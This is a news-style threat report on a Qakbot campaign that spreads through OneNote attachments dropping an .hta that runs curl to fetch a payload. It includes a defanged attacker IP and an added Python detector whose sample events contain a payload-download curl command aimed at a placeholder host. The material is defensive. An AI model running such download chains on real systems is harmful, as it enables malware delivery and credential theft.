Cyble Research Intelligence Labs (CRIL) detected a spam campaign that used the Qakbot malware, deployed via a OneNote attachment that the users were nudged to download. The Qakbot malware is capable of stealing usernames, passwords, and cookies from browsers.
The campaign involving Qakbot malware in OneNote begins with a malicious email whose OneNote attachment drops an embedded .hta file that is executed by mshta.exe. The subject line of the email sample read “OFERTA PO# 000938883 NSS”, and the OneNote file was named “ApplicationReject_68390(Jan31).one.”
“Kindly check the attached document,” read the email, followed by a grammatically incorrect sentence, “It would be curious for you.”
The Qakbot malware in OneNote can also steal emails from infected systems and spread itself to other devices within the network. It can deploy ransomware as planned by the threat actor.
Technical details of the Qakbot malware in OneNote
The OneNote attachment is made to look like a document stored in the cloud; double-clicking it as directed in the email triggers the Qakbot attack. First, it drops a .hta file named ‘attachment.hta’ that is executed using mshta.exe.
Sample of the .hta file (Image: Cyble)
The anonymous function in the .hta file can also be called with the URL ‘http://77[.]75[.]230[.]128/19825%5B.%5Ddat’ passed as an argument. The anonymous function creates a WScript.Shell object to run curl.exe. The 19825.dat file is then downloaded from the remote server and saved as 121.png in %Programdata%.
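As an added defender-side example (not Cyble's code or tooling), the following Python flags the execution chain just described in process-creation telemetry: OneNote spawning mshta.exe with a .hta argument, mshta.exe spawning curl.exe, and curl writing an image-named file into %ProgramData%. The event records, file paths and the download host are constructed placeholders, not data from the campaign.

```python
"""Flag the OneNote -> mshta.exe -> curl.exe -> %ProgramData%\\*.png chain
in Sysmon Event ID 1 / EDR-style process-creation events."""
import re

# Constructed sample events (simplified); host 198.51.100.10 is a documentation
# placeholder standing in for the campaign's download server.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\u\AppData\Local\Temp\attachment.hta"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe http://198.51.100.10/19825.dat -o C:\ProgramData\121.png"},
    # Benign: a user downloading an archive with curl from Explorer.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe https://example.org/tool.zip -o C:\Users\u\Downloads\tool.zip"},
]

# curl output (-o) landing under \ProgramData\ with an image extension, as the
# campaign's 19825.dat saved as 121.png did.
PROGRAMDATA_IMAGE = re.compile(
    r'-o\s+"?[^\s"]*\\ProgramData\\[^\s"]*\.(?:png|jpg|gif)\b', re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the detections that fire for one event."""
    hits = []
    parent, image = _basename(event["parent"]), _basename(event["image"])
    cmd = event["cmdline"]
    if parent == "onenote.exe" and image == "mshta.exe" and ".hta" in cmd.lower():
        hits.append("onenote_spawns_mshta")
    if parent == "mshta.exe" and image == "curl.exe":
        hits.append("mshta_spawns_curl")
    if image == "curl.exe" and PROGRAMDATA_IMAGE.search(cmd):
        hits.append("curl_writes_image_to_programdata")
    return hits


def scan(events):
    """(cmdline, detections) for every event that triggered at least one rule."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(hits, "<-", cmdline)
```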
CRIL researchers told The Cyber Express that, since Qakbot is an evolving malware, users must not open links from torrent or warez sites, which could potentially deliver malware.
Administrators are also urged to closely monitor the network for beaconing to prevent exfiltration of data. They can also opt for Data Loss Prevention (DLP) solutions to monitor the movement of data.